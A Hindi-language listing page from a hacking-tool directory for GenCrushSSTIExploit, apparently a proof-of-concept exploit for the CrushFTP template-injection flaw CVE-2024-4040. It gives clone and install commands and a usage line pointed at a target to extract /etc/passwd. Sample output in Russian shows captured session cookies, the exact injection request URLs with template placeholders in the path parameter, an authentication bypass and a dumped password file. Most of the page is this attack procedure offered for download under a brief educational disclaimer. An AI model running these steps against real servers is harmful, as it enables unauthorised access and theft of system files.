Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
GenCrushSSTIExploit — CVE-2024-4040 के लिए एक PoC है जो CrushFTP में SSTI कमजोरी का शोषण करने वाला टूल | Kitploit
उपकरण/GitHubGitHub/geniuszly/gencrushsstiexploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षा
GitHubgeniuszly/gencrushsstiexploit

GenCrushSSTIExploit

CVE-2024-4040 के लिए एक PoC है जो CrushFTP में SSTI कमजोरी का शोषण करने वाला टूल

रिपॉजिटरी देखें
811 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

GenCrushSSTIExploit एक PoC शोषण उपकरण है जो CrushFTP CVE-2024-4040 में SSTI (सर्वर-साइड टेम्पलेट इंजेक्शन) कमजोरी को लक्षित करता है। यह उपकरण केवल शैक्षिक और नैतिक हैकिंग उद्देश्यों के लिए इस कमजोरी का शोषण करने का प्रदर्शन करता है।

विशेषताएं

  • प्रमाणीकरण कुकीज़ निकालने के लिए CrushFTP सर्वर के साथ एक सत्र स्थापित करता है।
  • पेलोड इंजेक्ट करने के लिए SSTI कमजोरी का शोषण करता है।
  • प्रमाणीकरण को बायपास करने और सर्वर से संवेदनशील फ़ाइलें निकालने का प्रयास करता है।
  • सुंदर और स्टाइलिश कंसोल आउटपुट के लिए rich का उपयोग करता है।

अस्वीकरण

⚠️ इस उपकरण का जिम्मेदारी से उपयोग करें! यह केवल अनुसंधान और शैक्षिक उद्देश्यों के लिए है। लेखक इस उपकरण के दुरुपयोग या इससे होने वाली किसी भी क्षति के लिए जिम्मेदार नहीं है।

स्थापना

पूर्वापेक्षाएँ

  • Python 3.7+
  • pip (Python पैकेज इंस्टॉलर)

रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit

आवश्यक पैकेज स्थापित करें

root@kitploit:~
pip install -r requirements.txt

उपयोग

मूल कमांड

root@kitploit:~
python GenCrushSSTIExploit.py -t <TARGET_URL>
  • -t / --target: कमजोर CrushFTP सर्वर का लक्ष्य URL निर्दिष्ट करता है।

वैकल्पिक पैरामीटर

  • -l / --lfi: स्थानीय फ़ाइल समावेशन। निकालने के लिए फ़ाइल निर्दिष्ट करता है।
  • -w / --wordlist: फ़ाइल पथों की ब्रूट-फोर्सिंग के लिए एक शब्दसूची निर्दिष्ट करता है।

उदाहरण

root@kitploit:~
python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd

उदाहरण आउटपुट

root@kitploit:~
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------

[*] Подключение к ServerSessionAJAX...

[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987

[*] Попытка эксплуатации уязвимости SSTI...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a

[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com

[*] Попытка обхода аутентификации...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a

[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...
टूल डाउनलोड करें